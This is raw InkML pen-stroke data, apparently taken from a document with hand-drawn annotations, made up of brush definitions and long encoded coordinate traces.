0,-1-5 0,0 6 0,0-1 0,-1 1 0,0-1 0,-1 1 0,0-11 0,-1 16 0,1-1 0,-1 0 0,-1 0 0,1 0 0,-1 1 0,1-1 0,-1 0 0,0 1 0,0 0 0,0-1 0,-1 1 0,1 0 0,-1 0 0,-3-3 0,-8-6 0,0 0 0,-1 1 0,0 1 0,-1 1 0,-24-12 0,-89-30 0,105 42 0,5 3 0,0 2 0,0 0 0,0 1 0,0 1 0,-30 0 0,-8 0 0,-13-11 0,28 4 0,-70-14 0,-133-21 0,67 21 0,122 13 0,38 6 0,0 1 0,-23-1 0,-22 3 0,22 2 0,-1-3 0,-58-9 0,60 5 0,1 2 0,-61 2 0,60 3 0,0-3 0,-57-8 0,69 6 0,0 1 0,-36 2 0,38 1 0,-1-1 0,-45-7 0,15-1 0,-1 3 0,1 3 0,-85 5 0,33 0 0,-293-2 0,380-1 0,0-1 0,-26-6 0,24 3 0,-38-1 0,-200 5 0,123 2 0,122-2 0,0-1 0,-29-6 0,28 4 0,0 1 0,-21-1 0,-358 3 82,192 2-1529,186-1-5379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1:03.796"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">607 136 24575,'-5'4'0,"-1"0"0,0 0 0,0 0 0,0-1 0,-1 0 0,1-1 0,-1 1 0,-12 2 0,-18 7 0,15-3 0,-35 9 0,-20 8 0,54-16 0,-3 1 0,-44 27 0,25-18 0,40-18 0,0-1 0,0 1 0,0 0 0,1 0 0,-1 1 0,0-1 0,1 1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 1 0,0 0 0,1 0 0,-4 5 0,-1 7 0,1 1 0,-8 29 0,11-33 0,0-1 0,-1 1 0,0-1 0,-1 0 0,0 0 0,-10 15 0,12-21 0,0 0 0,0 0 0,1 1 0,0-1 0,0 1 0,0 0 0,1 0 0,0 0 0,1 0 0,-1 1 0,1 7 0,0 13 0,3 45 0,0-22 0,-2-39 0,0 0 0,1-1 0,0 1 0,1 0 0,4 17 0,-4-25 0,-1 0 0,1 0 0,0-1 0,0 1 0,1-1 0,-1 1 0,1-1 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,1-1 0,-1 0 0,1 1 0,-1-1 0,1-1 0,0 1 0,6 2 0,16 4 0,1 0 0,48 6 0,-48-10 0,-1 2 0,0 0 0,0 2 0,41 19 0,-57-23 0,0-1 0,0 0 0,1-1 0,16 3 0,-17-4 0,1 1 0,-1 0 0,0 0 0,17 8 0,-13-5 0,-1 0 0,2-1 0,-1 0 0,0-1 0,1-1 0,22 1 0,-22-2 0,45 9 0,-42-6 0,1-1 0,19 1 0,364-5 0,-385 2 0,-1 1 0,31 6 0,-29-4 0,0 0 0,21 0 0,536-3 0,-280-3 0,173 2 0,-452-1 0,1 0 0,29-8 0,-27 5 0,-1 1 0,21-1 0,14 2 0,1 2 0,-1 3 0,55 10 0,-69-8 0,1-2 0,0-1 0,46-4 0,65 3 0,-76 10 0,-49-6 0,52 2 0,389-8 0,-447 0 0,0-1 0,-1-1 0,1-1 0,26-9 0,-27 7 0,1 1 0,0 1 0,41-4 0,353 8 0,-181 1 0,-225-1 0,-1-1 0,1 0 0,-1-1 0,1 1 0,-1-2 0,1 1 0,-1-1 0,0 0 0,0 0 0,0-1 0,0 0 0,-1 0 0,0-1 0,0 1 0,0-1 0,0-1 0,-1 1 0,0-1 0,9-12 0,59-56 0,-67 68 0,-1 1 0,-1 0 0,0 0 0,1-1 0,-2 1 0,1-1 0,0 0 0,-1 0 0,0 0 0,-1-1 0,0 1 0,0-1 0,2-10 0,1-10 0,13-45 0,4-20 0,-21 82 0,0 0 0,0 0 0,-1 0 0,-1-1 0,1 1 0,-2 0 0,-2-12 0,1 13 0,0 0 0,0 0 0,-1 0 0,-1 1 0,1-1 0,-1 1 0,-1 0 0,1 1 0,-1-1 0,-1 1 0,1 0 0,-1 1 0,-8-7 0,-12-6 0,0 1 0,-44-21 0,10 6 0,-46-17 0,80 37 0,0 2 0,-1 1 0,0 1 0,-1 1 0,-30-4 0,-1-1 0,32 9 0,0 0 0,0 2 0,0 1 0,-37 4 0,26-1 0,-48-4 0,27-9 0,44 7 0,0 1 0,-26-2 0,-97 7 0,-56-4 0,135-9 0,43 7 0,1 1 0,-25-1 0,-4 3 0,18 1 0,0 0 0,1-2 0,-37-8 0,28 4 0,-2 2 0,1 1 0,0 2 0,-41 4 0,-4-1 0,-521-2 0,585-1 0,0 0 0,-29-8 0,28 5 0,0 1 0,-22-1 0,15 3 0,0-1 0,-45-8 0,-86-13 0,128 18 0,-46-2 0,44 5 0,-33-6 0,-76-15 0,112 18 0,-1 2 0,1 1 0,-1 1 0,-28 4 0,-59-4 0,55-10 0,43 8 0,1 0 0,-24-2 0,-416 4 0,220 3 0,196 2-1365,26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1:07.320"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 271 24575,'31'0'0,"-11"-1"0,-1 0 0,0 2 0,1 0 0,-1 2 0,0 0 0,0 1 0,22 7 0,-23-3 0,-1-1 0,0 0 0,0-1 0,0-1 0,1 0 0,-1-1 0,34 2 0,-12-6 0,0 2 0,40 8 0,-26 1 0,-23-4 0,-1-2 0,59 4 0,-48-9 0,0 1 0,59 10 0,-69-7 0,49 2 0,-52-6 0,0 2 0,42 8 0,-33-4 0,1-2 0,-1-1 0,1-2 0,38-4 0,7 1 0,-66 1 0,1-1 0,29-6 0,-27 4 0,-1 0 0,21 0 0,238 4 0,-130 1 0,-118-3 0,-1-1 0,1-2 0,47-13 0,-14 2 0,-37 11 0,-1-1 0,0 1 0,0 2 0,32-2 0,-42 5 0,0 1 0,1 0 0,-1-2 0,1 0 0,-1-1 0,1 0 0,-1-1 0,0 0 0,0-2 0,14-5 0,5-5 0,0 2 0,0 1 0,56-11 0,21 0 0,-56 14 0,-27 4 0,48-3 0,-69 8 0,-1 0 0,0-1 0,0 0 0,0 0 0,0 0 0,0-1 0,0 0 0,0 0 0,-1 0 0,1 0 0,0-1 0,4-3 0,3-4 0,-1 0 0,19-21 0,-17 17 0,-10 10 0,32-38 0,-34 40 0,1-1 0,0 1 0,-1-1 0,1 0 0,-1 0 0,0 0 0,1 0 0,-2 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1-1 0,0-2 0,0 5 0,-1-1 0,1 1 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,1 1 0,-1-1 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,-1-1 0,1 1 0,-2 0 0,-38-2 0,35 2 0,-222 3-1365,209-3-5461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1:08.220"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 1 24575,'11'-1'0,"-1"2"0,1 0 0,-1 0 0,1 0 0,16 6 0,-21-5 0,-1 1 0,1-1 0,-1 1 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 1 0,-1 0 0,0 1 0,6 6 0,49 65 0,-56-71-101,0 0 0,0 0-1,0 1 1,0-1 0,-1 0 0,2 9-1,-2-8-554,6 15-6170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4:49.506"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 4276 24575,'21'2'0,"0"0"0,-1 1 0,41 12 0,-36-8 0,50 7 0,-49-12 0,-10-1 0,0 1 0,0 0 0,0 0 0,-1 2 0,19 6 0,42 13 0,-51-16 0,41 16 0,60 28 0,-102-46 0,0-1 0,1-1 0,-1-1 0,0-2 0,44-3 0,3 0 0,592 3 0,-657 0 0,-1 0 0,0-1 0,1 0 0,-1 0 0,1 0 0,-1-1 0,0 0 0,0 0 0,0 0 0,0 0 0,7-5 0,4-2 0,-5 4 0,-1 1 0,1 1 0,0 0 0,0 0 0,17-1 0,-17 3 0,-1-1 0,1 0 0,-1 0 0,0-1 0,0-1 0,0 0 0,10-5 0,-6 2 0,0 1 0,0 1 0,1 0 0,-1 1 0,1 1 0,0 0 0,30-1 0,-23 2 0,0-1 0,-1-1 0,23-7 0,113-35 0,-95 27 0,-37 12 0,39-15 0,-51 17 0,1 0 0,0 1 0,28-3 0,-26 4 0,-1 0 0,31-9 0,-14 0 0,1 1 0,68-11 0,69 3 0,-147 17 0,-8 0 0,-1-2 0,0 1 0,0-2 0,0 0 0,0 0 0,18-12 0,-13 8 0,1 0 0,24-8 0,161-36 0,-182 45 0,-1-1 0,37-20 0,-37 17 0,1 0 0,27-8 0,-36 15 0,-1-1 0,-1 0 0,1-1 0,-1 0 0,0-1 0,0-1 0,10-10 0,17-11 0,-5 11 0,-27 15 0,0 1 0,0-1 0,0 0 0,9-8 0,4-5 0,157-151 0,-159 150 0,0 1 0,2 0 0,40-25 0,-2 10 0,-42 25 0,0-2 0,-1 1 0,0-2 0,-1 0 0,18-16 0,-5 0 0,-17 18 0,0 0 0,-1-1 0,0 0 0,-1-1 0,0 0 0,0 0 0,-1-1 0,9-17 0,-5 4 0,1 0 0,0 1 0,24-29 0,13-26 0,-32 51 0,1 1 0,29-33 0,9-11 0,-25 34 0,-24 29 0,0-1 0,0 0 0,-1 0 0,8-14 0,20-40 0,-15 29 0,-1-1 0,26-73 0,-37 89 0,0-1 0,1 2 0,15-23 0,-15 26 0,0-1 0,0 0 0,-2 0 0,1 0 0,4-21 0,-9 24 0,5-15 0,-2-1 0,-1 1 0,0-32 0,-3 41 0,1 1 0,6-29 0,-4 28 0,-1-1 0,2-20 0,-5 23 0,0-10 0,2 0 0,9-49 0,-5 36 0,-2 0 0,-1 0 0,-2 0 0,-4-40 0,0-11 0,3-1091 0,-1 1164 0,0 0 0,-8-29 0,5 28 0,1-1 0,-1-20 0,4-160 0,0 198 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 0 0,-1 0 0,1 0 0,0 1 0,-1-1 0,1 0 0,-1 1 0,0-1 0,1 0 0,-2 0 0,2 1 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 1 0,1-1 0,-1 0 0,0 0 0,0 1 0,0-1 0,1 0 0,-1 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,1-1 0,-1 1 0,-1 1 0,-35 44 0,29-35 0,3-5 0,-1-1 0,1-1 0,-1 1 0,1-1 0,-1 0 0,-1 0 0,1-1 0,0 1 0,-1-1 0,-7 2 0,8-3 0,-1 0 0,1 1 0,0 0 0,0 0 0,0 1 0,0 0 0,1 0 0,-1 0 0,1 0 0,0 1 0,-6 7 0,-1 7 0,1 1 0,-13 30 0,17-34 0,0 0 0,-2-1 0,0 1 0,0-1 0,-17 19 0,14-16 0,14-13 0,10-4 0,-2-4 24,0 0 0,-1 0 0,1 0 0,16-11 0,14-4-1509,-22 12-5341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01:44:50.886"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 1 24575,'4'1'0,"0"0"0,0 0 0,0 0 0,0 1 0,-1 0 0,1 0 0,0 0 0,4 4 0,10 4 0,14 3 0,-21-9 0,0 1 0,-1 0 0,0 0 0,10 7 0,35 24 0,-33-22 0,-1 0 0,37 33 0,65 61 0,-103-92 0,5 12 42,-22-24-170,0 0 0,0 0 0,0-1 0,1 1 0,-1-1 0,1 0 1,0 0-1,0 0 0,0 0 0,5 2 0,5-1-6698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4:45:02.134"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 113 24575,'9'-1'0,"0"-1"0,0 0 0,0 0 0,-1-1 0,1 0 0,-1 0 0,0-1 0,12-7 0,26-11 0,-9 9 0,1 0 0,1 3 0,0 1 0,53-5 0,-82 14 0,1 0 0,0 0 0,0 1 0,20 4 0,-28-4 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 1 0,0 0 0,0 0 0,1 0 0,-2 0 0,1 0 0,0 0 0,0 1 0,-1-1 0,1 1 0,-1 0 0,0 0 0,0 0 0,2 3 0,0 3 0,11 20 0,-1 0 0,13 43 0,-25-62 0,1 0 0,-1 1 0,0 0 0,-1-1 0,-1 1 0,0 0 0,0-1 0,-1 1 0,0 0 0,-1-1 0,-3 13 0,-3 9 0,7-27 0,1 1 0,-1-1 0,-1 1 0,1-1 0,-1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,0-1 0,-1 1 0,1-1 0,-1 0 0,0 0 0,0 0 0,-5 4 0,-3 1 0,1 1 0,0 0 0,-17 20 0,21-21 0,-1 0 0,0 0 0,-1-1 0,0 0 0,0-1 0,-18 11 0,21-15 0,-1 1 0,1 0 0,0 0 0,0 1 0,0-1 0,1 1 0,-1 1 0,1-1 0,0 1 0,1 0 0,0 0 0,0 0 0,0 1 0,0-1 0,1 1 0,0 0 0,-3 14 0,1-6 0,2 0 0,0 1 0,1 0 0,1-1 0,1 28 0,-4 34 0,4-77 2,0 0 0,0 1 0,0-1 1,0 0-1,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 0 0,-1 1 0,1-1 0,0 0 1,0 0-1,0 1 0,-1-1 0,1 0 0,0 0 0,0 1 0,0-1 0,-1 0 0,1 0 0,0 0 0,-1 1 0,1-1 0,0 0 0,0 0 0,-1 0 1,1 0-1,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 1,-1 0-1,1 0 0,0 0 0,0 0 0,-1-1 0,-13-10-1475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4:45:03.904"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 0 24575,'0'4'0,"0"5"0,0 5 0,4 0 0,1 1 0,4-2 0,0 1 0,-2-6 0,-5-4 0,-4-7 0,-4-2 0,-2-5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44.706"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">2765 3 24575,'-57'-1'0,"28"-1"0,0 2 0,0 1 0,1 1 0,-1 1 0,1 2 0,-34 9 0,-89 25 0,15-6 0,110-26 0,-1-1 0,-33 3 0,29-5 0,-37 10 0,-39 9 0,77-18 0,-1 1 0,1 2 0,1 1 0,-56 25 0,52-17 0,-1-2 0,-55 17 0,45-22 0,33-8 0,1 0 0,-1 1 0,1 0 0,0 1 0,-15 6 0,4 3 0,1 1 0,-31 27 0,-9 6 0,30-28 0,-39 18 0,-16 11 0,41-12 0,35-27 0,-1-1 0,-20 14 0,-144 94 0,138-86 0,1 3 0,-44 51 0,9-8 0,40-46 0,2 2 0,1 1 0,1 1 0,-23 43 0,1 14 0,23-37 0,-41 68 0,23-44 0,3 2 0,-32 92 0,46-106 0,21-49 0,0 0 0,1 1 0,1-1 0,-1 22 0,-4 18 0,8-55 0,-32 197 0,23-132 0,4-36 0,-2 50 0,8 587 0,0-646 0,2 0 0,0 0 0,2-1 0,9 31 0,3 11 0,-10-40 0,0-1 0,14 28 0,0 0 0,62 161 0,-16-84 0,-11-24 0,-37-60 0,-10-23 0,0 0 0,0-1 0,19 25 0,122 168 0,-126-170 0,-19-31 0,1 0 0,0-1 0,13 17 0,-2-5 0,-2 0 0,0 1 0,13 29 0,-17-31 0,0 0 0,2-1 0,0 0 0,28 31 0,-36-45 0,1 1 0,-1 1 0,0-1 0,6 13 0,-7-13 0,0 0 0,0 0 0,0-1 0,1 1 0,0-1 0,9 9 0,22 15 0,-2 2 0,-1 1 0,51 65 0,-48-59 0,-6-10 0,-20-18 0,2 0 0,-1-1 0,1-1 0,1 0 0,0-1 0,0 0 0,16 7 0,-13-8 0,-1 2 0,0 0 0,0 1 0,-1 0 0,14 14 0,-19-16 0,1-1 0,-1 0 0,15 9 0,11 6 0,-12-7 0,1-1 0,0-2 0,1 0 0,0-2 0,1-1 0,39 10 0,37 13 0,-77-24 0,0 0 0,1-2 0,31 5 0,-6-2 0,-26-5 0,-1 0 0,31 0 0,-22-2 0,44 7 0,-45-4 0,49 1 0,-34-5 0,62-3 0,-106 1-105,-1 1 0,1 0 0,-1-1 0,0 1 0,1-1 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,2-2 0,6-7-6721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4:45:45.830"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.025" units="cm"/>
      <inkml:brushProperty name="height" value="0.025" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">27 71 24575,'0'44'0,"1"-11"0,-1 0 0,-2 0 0,-11 58 0,8-60 0,1 1 0,2 0 0,1 0 0,3 34 0,-1-1 0,-1-60 0,0-1 0,0 1 0,1-1 0,-1 1 0,1-1 0,0 1 0,0-1 0,1 0 0,-1 1 0,1-1 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,1-1 0,0 1 0,0-1 0,7 6 0,-5-6 0,1 1 0,0-1 0,0 0 0,0-1 0,0 1 0,1-1 0,-1 0 0,1-1 0,-1 0 0,1 0 0,-1 0 0,14-1 0,1698-3 0,-1701 4 0,0 0 0,29 8 0,-28-5 0,0-1 0,21 1 0,521-2 0,-272-4 0,135 2 0,-415 0 0,1-1 0,-1 1 0,1-1 0,-1-1 0,0 0 0,0 0 0,0 0 0,0-1 0,0 0 0,0-1 0,-1 0 0,1 0 0,11-9 0,-14 9 0,0-1 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0-1 0,-1 1 0,0-1 0,0 0 0,0 0 0,-1-1 0,1 1 0,-2 0 0,1-1 0,-1 1 0,0-1 0,1-11 0,0 1 0,0 1 0,2 0 0,0 1 0,0-1 0,2 0 0,0 1 0,0 0 0,14-20 0,-17 29 0,20-25 0,-20 28 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1-1 0,-1 1 0,0-1 0,0 0 0,-1 0 0,1 1 0,-1-1 0,1-5 0,-1 5 0,0 1 0,-1 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,-1 0 0,1-1 0,-1 1 0,0 0 0,0 0 0,0-1 0,0 1 0,-1 0 0,1 0 0,-5-5 0,3 4 0,0 1 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 1 0,0-1 0,0 1 0,-1 0 0,1 0 0,-7-1 0,-7-2 0,0 2 0,0 0 0,-1 1 0,1 1 0,-25 1 0,-948 4 0,533-6 0,439 1 0,0-1 0,-28-6 0,-24-3 0,54 9 0,0-1 0,-1 0 0,-30-12 0,32 10 0,-1 0 0,0 0 0,-33-3 0,-23-3 0,52 7 0,-41-3 0,31 5 0,-34-7 0,35 4 0,-44-1 0,56 4 0,-1 0 0,-23-5 0,22 3 0,-37-3 0,32 6 0,0 0 0,-46-10 0,-62-12 0,96 17 0,0 2 0,-1 2 0,-70 4 0,24 0 0,-2-3 0,-94 3 0,172-2 0,0 1 0,1 0 0,-1 1 0,1 0 0,-1 0 0,1 1 0,0-1 0,0 1 0,0 1 0,0 0 0,1 0 0,0 0 0,-1 1 0,1-1 0,1 1 0,-1 1 0,-8 11 0,7-9-120,2-2-35,0 0-1,1 0 0,-2-1 1,1 0-1,0 0 0,-1 0 1,-8 4-1,1-3-6670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12:00.869"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 0 24575,'3'1'0,"0"0"0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,-1 0 0,1 0 0,-1 1 0,1-1 0,-1 1 0,4 4 0,12 11 0,-6-9 0,0 2 0,-1-1 0,-1 2 0,0-1 0,0 2 0,9 14 0,-6-7 0,25 26 0,-32-38 0,1 1 0,-1 0 0,-1 0 0,0 1 0,5 11 0,7 13 0,71 122 0,-81-141 0,0-1 0,-1 1 0,8 27 0,-11-29 0,1 0 0,1-1 0,0 1 0,1-1 0,0 0 0,10 15 0,5 4 0,-2 0 0,-2 1 0,0 1 0,-3 0 0,0 1 0,15 65 0,-10-35 0,10 47 0,-24-66 0,-2-1 0,-5 82 0,0-33 0,3-23 0,1-40 0,-1 0 0,-2 0 0,-1 0 0,-1 0 0,-9 39 0,-23 43 0,25-81 0,-23 47 0,16-46 0,-1 0 0,-1-2 0,-32 38 0,39-55 0,-1 0 0,0 0 0,-30 20 0,-19 18 0,62-51-21,0 0 0,0 1 0,0-1 0,-1 0 0,1 1 0,0-1 0,0 0 0,0 1 0,0-1 0,-1 0 0,1 0 0,0 1 0,0-1 0,-1 0 0,1 0 0,0 1 0,-1-1 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 1 0,-1-1 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,0-1 0,-1 1 0,1 0 0,0 0 0,-1 0 0,1 0 0,0-1 0,0 1 0,-1 0 0,1 0 0,0-1 0,0 1 0,-1 0 0,1-1 0,0 1 0,0 0 0,0 0 0,-1-1 0,1 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1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12:02.099"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 1 24575,'0'22'0,"1"-1"0,2 1 0,6 32 0,14 59 0,0 34 0,0-26 0,-20-105 0,1-1 0,1 0 0,0 0 0,10 19 0,-11-28 0,0 0 0,0-1 0,0 1 0,0-1 0,1 0 0,0 0 0,0 0 0,0 0 0,1-1 0,0 0 0,0 0 0,7 3 0,4 3 0,0 0 0,22 19 0,-25-18 0,0 0 0,1-2 0,23 13 0,-17-13 0,0 0 0,0-1 0,24 4 0,58 19 0,-81-23 0,-1-1 0,1 0 0,0-2 0,0-1 0,32 2 0,-36-5-116,4-1-196,0 0 0,0 2-1,37 8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37:14.973"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">2541 1370 24575,'0'-5'0,"0"1"0,0-1 0,1 1 0,-1-1 0,1 1 0,0-1 0,0 1 0,1 0 0,-1-1 0,1 1 0,0 0 0,0 0 0,0 0 0,1 0 0,0 1 0,-1-1 0,1 0 0,0 1 0,1 0 0,-1 0 0,0 0 0,1 0 0,0 1 0,0-1 0,0 1 0,4-2 0,20-14 0,0-2 0,27-24 0,-28 21 0,55-35 0,-53 40 0,39-33 0,-44 31 0,1 1 0,30-16 0,70-39 0,-116 70 0,1-1 0,0 1 0,0 1 0,1 0 0,-1 0 0,21-2 0,-18 3 0,0 0 0,0-1 0,-1 0 0,19-9 0,60-40 0,-69 37 0,1 1 0,1 1 0,39-15 0,48-8 0,103-38 0,-140 46 0,0 3 0,123-24 0,-99 23 0,-75 19 0,-1 0 0,1 2 0,1 0 0,37-2 0,-35 7 0,-1-1 0,1-1 0,-1-1 0,0-2 0,0 0 0,37-14 0,-44 14 0,0 0 0,0 2 0,0 0 0,0 1 0,29 0 0,-24 2 0,-1-2 0,1 0 0,23-6 0,187-37 0,-170 33 0,-40 7 0,1 1 0,34-2 0,-38 4 0,0 0 0,28-8 0,-26 6 0,36-5 0,-25 6 0,43-11 0,-18 3 0,-6-2 0,10-1 0,104-16 0,54-16 0,-105 19 0,-83 22-114,44-2 0,16-3-295,127-24 409,-186 29 0,0 2 0,38 1 0,-39 2 0,-1-2 0,47-7 0,-8-2-131,-1 4 0,1 3 0,96 7 1,-38-1 29,889-2 535,-979-2-958,58-10-1,-55 5 565,46 0-1,707 5-1025,-383 4 835,-303-3 594,119 3 926,-141 11-904,-56-7-136,49 3-1,-1-10-328,-45 0 0,-1 2 0,1 0 0,43 9 0,34 11 0,59 15 0,-64-17-275,-72-15 99,58 17 0,-31-3-186,124 21 0,-139-30 340,-1 2-1,47 17 0,-40-11 107,278 75-86,-217-51 41,-73-25 261,64 17 1,-55-21-185,0 2 0,-1 2 0,-1 2 1,-1 2-1,64 38 0,-32-16-116,-46-27 0,55 38 0,117 104 0,-164-125 0,61 66 0,-16-14 0,-61-61 0,-1 1 0,24 35 0,-23-29 0,34 37 0,-50-59 0,-1 1 0,1 0 0,-2 0 0,1 1 0,-1 0 0,5 15 0,17 30 0,13 5 0,56 100 0,-74-122 0,31 41 0,-31-48 0,-1 0 0,21 45 0,65 171-761,-18-25 224,-5-20 537,-71-171 0,-1 1 0,-2 0 0,8 39 0,12 38 0,1-13 0,21 112 0,-31-110 0,-10-55 0,-2 2 0,-2-1 0,2 64 0,-8-52 0,14 99 0,-6-69 2,-4 0-1,-7 99 0,0-56 119,0-84 116,-3 0 1,-21 88 0,23-121-173,-2 0 0,1-1 0,-1 1 0,-1-1 0,0 0 0,-15 19 0,16-22-48,-6 10-16,-15 35 0,-9 16 0,7-28 0,-50 58 0,26-43-3,-49 58-314,85-96 19,-2 0 1,0-1-1,-1-1 1,-1-1-1,0 0 1,-38 19-1,-42 30 220,-69 72-1327,115-96 1405,-1-3 0,-2-2 0,-115 51 0,145-72 11,1 2 0,-29 22 1,-36 21-392,-188 106-1095,157-90 1221,55-39 254,-90 35 0,138-63 0,-12 8 0,1 1 0,1 1 0,-51 41 0,47-33 0,-2-2 0,-37 21 0,-322 152-93,204-98 69,-76 35-293,178-95 317,26-11 0,-108 34 0,-190 58 1099,351-117-1080,-85 36-19,55-22 0,-1-2 0,-55 15 0,-61 13 0,-17 3 0,25-4 0,-3 0 0,-20-13 591,-51 10 296,168-26-865,-103 27 144,-58 14-64,71-20-70,19-10-32,-3 0 0,86-14-216,-57 4 0,63-10 31,-1 2 1,-56 16-1,52-11 177,1-2 0,-74 6 1,41-6-6,-111 18 923,-31 1-219,165-23-784,-70 0 1,69-4-1,-68 9 1,41-2 92,-155-2 0,13-3 0,115 10-218,-32 2-99,37-16 231,61-1 15,0 2 1,0 1-1,-63 12 0,38-3 71,0-3 0,0-3 0,-105-6 0,51 0 0,-554 2 392,634 2-392,-59 10 0,56-5 0,-43 0 0,-69-8 468,-68 3-38,131 10-441,-19 2 177,-8 0 317,74-7-335,-45 1-1,68-6 80,1 0 0,-29 7 0,27-4 70,-38 3 0,45-6-199,0 0 1,0 1 0,0 1-1,1 0 1,-24 10-1,-7 3-15,27-13-83,-1 0 0,0-1 0,0-1 0,-30 0 0,23-1 0,-42 6 0,-140 27 0,68-6 0,117-24 0,0-1 0,-45-1 0,46-2 0,0 1 0,1 1 0,-37 7 0,34-4 0,0-1 0,-43 1 0,42-4 0,1 1 0,-40 9 0,-8 0 0,60-11 0,0 1 0,0 0 0,0 1 0,0 1 0,0-1 0,0 2 0,1 0 0,-17 8 0,-21 17 0,-99 69 0,109-72 0,-1-3 0,-77 35 0,2-1 0,48-25 0,-105 37 0,62-28 0,84-32 0,0-2 0,-26 5 0,31-9 0,1 2 0,0 0 0,0 1 0,-33 15 0,32-11 0,0-1 0,-30 8 0,32-12 0,1 1 0,0 1 0,0 0 0,-21 14 0,-26 12 0,52-28 0,0 1 0,1 0 0,-1 0 0,2 1 0,-20 15 0,-30 24 0,41-33 0,-27 25 0,31-23 0,8-8 0,0 1 0,0-2 0,-1 1 0,0-1 0,0 0 0,0-1 0,-18 9 0,6-5 0,0 2 0,1 0 0,1 1 0,-30 25 0,-6 4 0,8-8 0,-68 62 0,79-67 0,26-22 0,0 